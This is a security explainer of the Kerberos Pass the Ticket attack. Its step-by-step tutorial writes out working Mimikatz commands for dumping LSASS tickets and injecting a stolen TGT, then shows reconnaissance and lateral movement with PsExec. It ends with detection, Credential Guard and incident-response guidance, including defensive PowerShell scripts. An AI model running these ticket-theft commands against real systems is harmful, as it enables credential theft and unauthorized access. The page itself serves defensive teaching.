Pass the Ticket Attack

Active Directory
Credential Theft
Defense Evasion
Kerberos
Lateral Movement

Pass the Ticket is a credential theft technique in which an adversary reuses stolen Kerberos tickets to authenticate to resources (e.g., file shares and other computers) as a user without ever learning that user’s password. Adversaries typically use it to move laterally through an organization’s network while hunting for opportunities to escalate their privileges or fulfill their mission.

Both ticket-granting tickets (TGTs) and ticket-granting service (TGS) tickets, also called service tickets, can be stolen and reused. Without administrative privileges, an adversary can obtain the current user’s TGT (through the “fake delegation” trick, which asks the local Kerberos provider for a forwardable TGT as though delegating it to a service and then recovers that TGT from the resulting authenticator) together with every TGS ticket the current user holds. With administrative privileges, an adversary can read the memory of the LSASS process and obtain every TGT and TGS ticket cached on the system, for every logged-on user.

Threat Summary

Target: Active Directory
Tools: Mimikatz, PsExec
ATT&CK® Tactic: Defense Evasion, Lateral Movement
ATT&CK Technique:
Difficulty:
  Detection: Medium
  Mitigation: Hard
  Response: Medium

Attack Tutorial: How Pass the Ticket Attacks Work

STEP 1

Steal a user’s ticket

An adversary uses a tool like Mimikatz to extract Kerberos tickets from the memory of the LSASS.exe process:
########
# To capture TGTs, this invocation of mimikatz must be run from an elevated shell.
########
PS> mimikatz.exe "privilege::debug" "sekurlsa::tickets /export"
########
# mimikatz outputs all tickets to screen and also writes them individually to files
# in the current directory. We have truncated the output to show a single session.
########
Authentication Id : 0 ; 31770591 (00000000:01e4c7df)
Session           : RemoteInteractive from 4
User Name         : joed
Domain            : DOMAIN
Logon Server      : DC1
Logon Time        : 03/07/2020 08:07:58
SID               : S-1-5-21-3501040295-3816137123-30697657-1109
 
         * Username : joed
         * Domain   : DOMAIN.COM
         * Password : (null)
 
        Group 0 - Ticket Granting Service
         [00000000]
           Start/End/MaxRenew: 09/07/2020 07:45:44 ; 09/07/2020 17:45:44 ; 16/07/2020 07:45:44
           Service Name (03) : host ; host.domain.com ; @ DOMAIN.COM
           Target Name  (03) : host ; host.domain.com ; @ DOMAIN.COM
           Client Name  (01) : joed ; @ DOMAIN.COM ( DOMAIN.COM )
           Flags 40a10000    : name_canonicalize ; pre_authent ; renewable ; forwardable ;
           Session Key       : 0x00000012 - aes256_hmac
             516bedd608a71be859f1c0fa450708d915cd7e3bd99df793057ac110debfa98e
           Ticket            : 0x00000012 - aes256_hmac       ; kvno = 2        [...]
           * Saved to file [0;1e4c7df]-0-0-40a10000-joed@host-host.domain.com.kirbi !

        Group 1 - Client Ticket ?
 
        Group 2 - Ticket Granting Ticket
         [00000000]
           Start/End/MaxRenew: 09/07/2020 07:45:44 ; 09/07/2020 17:45:44 ; 16/07/2020 07:45:44
           Service Name (02) : krbtgt ; DOMAIN.COM ; @ DOMAIN.COM
           Target Name  (02) : krbtgt ; DOMAIN ; @ DOMAIN.COM
           Client Name  (01) : joed ; @ DOMAIN.COM ( DOMAIN )
           Flags 40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
           Session Key       : 0x00000012 - aes256_hmac
             34911deb40f5b400cfd9d8234b36dfdf2064b27bfabccdd65f077ed90918d85d
           Ticket            : 0x00000012 - aes256_hmac       ; kvno = 2        [...]
           * Saved to file [0;1e4c7df]-2-0-40e10000-joed@krbtgt-DOMAIN.COM.kirbi !
PS>
STEP 2

Reuse the ticket

Next, the threat actor uses mimikatz.exe kerberos::ptt or a tool with similar capabilities to inject the stolen TGT into their own session, causing their session to adopt the identity and privileges of the stolen TGT for subsequent authentications to resources:
PS> mimikatz.exe "kerberos::ptt C:\KerberosTickets\[0;1e4c7df]-2-0-40e10000-joed@krbtgt-DOMAIN.COM.kirbi"
 
* File: 'C:\KerberosTickets\[0;1e4c7df]-2-0-40e10000-joed@krbtgt-DOMAIN.COM.kirbi': OK
PS>
# The following command can be used to verify that the right ticket was successfully injected
PS> mimikatz.exe "kerberos::list"
[00000000] - 0x00000012 - aes256_hmac
   Start/End/MaxRenew: 09/07/2020 07:45:44 ; 09/07/2020 17:45:44 ; 16/07/2020 07:45:44
   Server Name       : krbtgt/DOMAIN.COM @ DOMAIN.COM
   Client Name       : joed @ DOMAIN.COM
   Flags 40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
PS> 
STEP 3

Conduct internal reconnaissance

Once a stolen ticket is ready for reuse, the threat actor needs to determine where it can be used:

A stolen TGS ticket grants access only to the service it was issued for, and the adversary can read that from the ticket itself: it is the Service Name field in the mimikatz output above (host/host.domain.com in this case).

To use a stolen TGT, however, the attacker may need to conduct internal reconnaissance to determine what access it provides. This may be as straightforward as querying the user’s group memberships and looking for obvious indicators. Many tools exist to enumerate Active Directory, but an adversary can also use built-in commands like net to discover these details:
PS> net user joed /domain
The request will be processed at a domain controller for domain domain.com.
 
User name                    joed
Full Name                    Joe Dibley
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never
 
Password last set            ‎6/‎15/‎2020 3:42:00 PM
Password expires             Never
Password changeable          ‎6/‎16/‎2020 3:42:00 PM
Password required            Yes
User may change password     Yes
 
Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   ‎7/‎9/‎2020 6:26:56 PM
 
Logon hours allowed          All
 
Local Group Memberships
Global Group memberships     *Workstation Administrators *VPNUser
                             *FileServer1_PublicShare *Domain Users
The command completed successfully.
PS> 
STEP 4

Access resources as the user

Finally, the threat actor can use lateral movement techniques to reach other resources and further their objectives. Here PsExec authenticates to workstation456 over SMB with the injected ticket. The target is named by hostname rather than IP address so that Kerberos, not NTLM, is negotiated (an injected ticket does nothing for NTLM authentication), and the command succeeds because joed’s group memberships (Workstation Administrators above) give the administrative rights on that workstation that PsExec requires:
PS> .\PsExec.exe \\workstation456 powershell.exe
 
PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
 
 
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
 
Try the new cross-platform PowerShell https://aka.ms/pscore6
 
PS> hostname
workstation456
PS>

Detect, Mitigate and Respond

Detect

Difficulty: Medium

Endpoints and Active Directory are both sources of signals indicating active use of Pass the Ticket attacks.

Detection on endpoints

Options include the following:

  • Detect processes reading the memory of LSASS.exe (as sekurlsa::tickets does) or injecting tickets into a logon session through the LSA authentication-package interface (as kerberos::ptt does). Many endpoint detection and response solutions can alert on both.
  • Analyze logged-on sessions for a username mismatch between the logged-on user and the client name in its cached Kerberos tickets, which is the state that ticket injection leaves behind. We’ve created a proof-of-concept for this detection, written in PowerShell.

Detection in Active Directory

Collect and correlate Kerberos events from all domain controllers, as follows:

  1. Develop a ledger that records when and on which endpoint (the client address in the event) each ticket-granting ticket (TGT) was issued or renewed. To do so, audit the following events:
    • ‘A Kerberos Authentication Ticket (TGT) was requested’ (Event ID 4768)
    • ‘A Kerberos Service Ticket was renewed’ (Event ID 4770)
  2. Compare each request for a ticket-granting service (TGS) ticket against the ledger to confirm that the requesting endpoint is the one the TGT was issued to. To do so, audit ‘A Kerberos Service Ticket was requested’ (Event ID 4769) and match its client address and user against the ledger: a service ticket request for a user from an address that never obtained that user’s TGT is the signature of an injected TGT.
Note that the volume of these events in all but the smallest environments is substantial, which makes manual analysis impractical. As a result, real-time, machine-driven detection is preferred.
It is not possible to detect the theft and use of a single TGS ticket in Active Directory: a service ticket is presented directly to the target service and never to a domain controller, so no domain controller event records its use. Only the endpoint-side checks above can catch it.
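The correlation described in the two steps above, written out as an added PowerShell example (not the page’s own detection). Find-TicketSourceMismatch builds the TGT ledger from 4768 and 4770 events and flags 4769 service ticket requests, and 4770 renewals, that arrive from an address which never obtained a TGT for that user within the TGT lifetime. The events at the bottom are constructed sample data; Convert-KerberosEvent is an assumed helper that turns real Get-WinEvent records from a domain controller’s Security log into the same shape. The 10-hour lifetime is the default domain Kerberos policy and should be replaced with the environment’s value.

```powershell
# Added example (not the page's code). Correlates TGT issuance/renewal (4768/4770)
# with service ticket requests (4769) per user and client address.

function Find-TicketSourceMismatch {
    param(
        [Parameter(Mandatory)][object[]]$Events,            # Id, Time, User, IpAddress, Service, Status
        [TimeSpan]$TgtLifetime = (New-TimeSpan -Hours 10)   # default domain Kerberos policy
    )
    $ledger = @{}   # user -> entries of (IpAddress, Time) where a TGT was issued or renewed
    foreach ($e in ($Events | Sort-Object Time)) {
        if ($e.Status -and $e.Status -ne '0x0') { continue }   # failed requests carry no ticket
        $user = $e.User.ToLowerInvariant()
        if (-not $ledger.ContainsKey($user)) { $ledger[$user] = @() }

        # Does this address already hold a TGT for this user that is still within its lifetime?
        $known = @($ledger[$user] | Where-Object {
            $_.IpAddress -eq $e.IpAddress -and ($e.Time - $_.Time) -le $TgtLifetime })

        $suspicious = $false
        switch ($e.Id) {
            4768 { $ledger[$user] += [pscustomobject]@{ IpAddress = $e.IpAddress; Time = $e.Time } }
            4770 {
                if ($known.Count) { $ledger[$user] += [pscustomobject]@{ IpAddress = $e.IpAddress; Time = $e.Time } }
                else { $suspicious = $true }      # renewal from a host that never obtained the TGT
            }
            4769 { if (-not $known.Count) { $suspicious = $true } }
        }
        if ($suspicious) {
            [pscustomobject]@{
                Time            = $e.Time
                EventId         = $e.Id
                User            = $e.User
                Service         = $e.Service
                IpAddress       = $e.IpAddress
                KnownTgtSources = @($ledger[$user] | ForEach-Object IpAddress | Sort-Object -Unique) -join ','
            }
        }
    }
}

# Assumed helper: shape a Security-log record into the object layout above, e.g. from
# Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4768, 4769, 4770 } on a DC.
function Convert-KerberosEvent {
    param([Parameter(Mandatory, ValueFromPipeline)]$Record)
    process {
        $data = @{}
        foreach ($d in ([xml]$Record.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        [pscustomobject]@{
            Id        = $Record.Id
            Time      = $Record.TimeCreated
            User      = ($data['TargetUserName'] -split '@')[0]      # 4769/4770 log user@REALM, 4768 logs user
            IpAddress = $data['IpAddress'] -replace '^::ffff:', ''   # strip the IPv4-mapped prefix
            Service   = $data['ServiceName']
            Status    = $data['Status']
        }
    }
}

# Constructed sample: joed's workstation (10.0.0.50) obtains a TGT and a service ticket;
# later a service ticket for joed is requested from 10.0.0.99, which never obtained his TGT.
$t0 = Get-Date '2020-07-09 07:45:44'
$sample = @(
    [pscustomobject]@{ Id = 4768; Time = $t0;                User = 'joed'; IpAddress = '10.0.0.50'; Service = 'krbtgt';               Status = '0x0' }
    [pscustomobject]@{ Id = 4769; Time = $t0.AddSeconds(2);  User = 'joed'; IpAddress = '10.0.0.50'; Service = 'host/host.domain.com'; Status = '0x0' }
    [pscustomobject]@{ Id = 4769; Time = $t0.AddMinutes(95); User = 'joed'; IpAddress = '10.0.0.99'; Service = 'cifs/workstation456';  Status = '0x0' }
)
Find-TicketSourceMismatch -Events $sample | Format-Table -AutoSize   # reports only the 10.0.0.99 request
```

Two caveats a practitioner will hit: the client address in 4768/4769 is the address the domain controller saw, so clients behind NAT or a VPN concentrator whose address changes mid-session will produce false positives, and the ledger must be fed from every domain controller because the TGT and the service ticket requests can land on different ones.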
Mitigate

Difficulty: Hard

The best mitigation tactics focus on making tickets harder to steal and limiting what a threat actor can do with a stolen ticket:
  • Enable Microsoft’s Windows Defender Credential Guard. Introduced in Windows 10 and Windows Server 2016, Credential Guard uses virtualization-based security to move the TGT session key and other LSA secrets into an isolated process that even an administrator with SeDebugPrivilege cannot read, so sekurlsa::tickets no longer yields a usable TGT. It is a partial mitigation: service tickets cached in LSASS and the unprivileged “fake delegation” route to the current user’s TGT remain available.
  • Do not allow users to possess administrative privileges to a large number of endpoints. This greatly reduces the risk that an adversary can use a stolen ticket for lateral movement.
  • Do not allow users to possess administrative privileges across security boundaries. This greatly reduces the risk that an adversary can use a stolen ticket to escalate their privileges.
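The following PowerShell, added here as an example and not drawn from the page, reports whether Credential Guard is running on the local host and, if it is not, writes the documented registry values that enable it (with the UEFI lock by default). It assumes the host meets the virtualization-based security prerequisites (64-bit, UEFI with Secure Boot, virtualization extensions) and that a reboot follows; on domain members the same settings are normally delivered by Group Policy rather than set by hand.

```powershell
# Added example (not from the page). Check Credential Guard state and enable it.
# Registry paths/values are the documented Windows settings; a reboot is required.

function Get-CredentialGuardState {
    $dg = Get-CimInstance -Namespace 'root\Microsoft\Windows\DeviceGuard' -ClassName Win32_DeviceGuard
    [pscustomobject]@{
        VbsStatus                 = $dg.VirtualizationBasedSecurityStatus   # 0 off, 1 enabled, 2 running
        CredentialGuardConfigured = ($dg.SecurityServicesConfigured -contains 1)  # 1 = Credential Guard
        CredentialGuardRunning    = ($dg.SecurityServicesRunning -contains 1)
    }
}

function Enable-CredentialGuard {
    param([switch]$NoUefiLock)   # weak choice: without the lock it can be switched off remotely
    $dgKey  = 'HKLM:\SYSTEM\CurrentControlSet\Control\DeviceGuard'
    $lsaKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    if (-not (Test-Path $dgKey)) { New-Item -Path $dgKey -Force | Out-Null }

    Set-ItemProperty -Path $dgKey -Name EnableVirtualizationBasedSecurity -Value 1 -Type DWord
    # 1 = require Secure Boot, 3 = require Secure Boot and DMA protection
    Set-ItemProperty -Path $dgKey -Name RequirePlatformSecurityFeatures -Value 1 -Type DWord
    # LsaCfgFlags: 1 = Credential Guard with UEFI lock, 2 = without lock, 0 = disabled
    $flags = if ($NoUefiLock) { 2 } else { 1 }
    Set-ItemProperty -Path $lsaKey -Name LsaCfgFlags -Value $flags -Type DWord
}

$state = Get-CredentialGuardState
$state
if (-not $state.CredentialGuardRunning) {
    Enable-CredentialGuard
    Write-Warning 'Credential Guard configured; reboot the host for it to start, then re-run Get-CredentialGuardState.'
}
```

Prefer the UEFI lock in production: with LsaCfgFlags set to 2 an adversary who already has administrative rights can simply clear the value and reboot, which is the very adversary this control is meant to stop.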
Respond

Difficulty: Medium

Options for responding to a detected use of Pass the Ticket include the following:
  • Reset the password of the compromised user account and disable the user to a) force instantaneous replication to all domain controllers, and b) prevent further use of the compromised ticket. A password reset alone does not revoke tickets that were already issued: the stolen TGT keeps obtaining service tickets until it expires (10 hours by default) unless the account is disabled, and a stolen service ticket keeps working against its target service until it expires regardless.
  • Reset the password for all users who have logged on to an impacted machine.
  • Quarantine the impacted machines for forensic investigation, as well as eradication and recovery activities.
  • Activate the incident response process and alert the response team.


MITRE ATT&CK® and ATT&CK® are registered trademarks of The MITRE Corporation.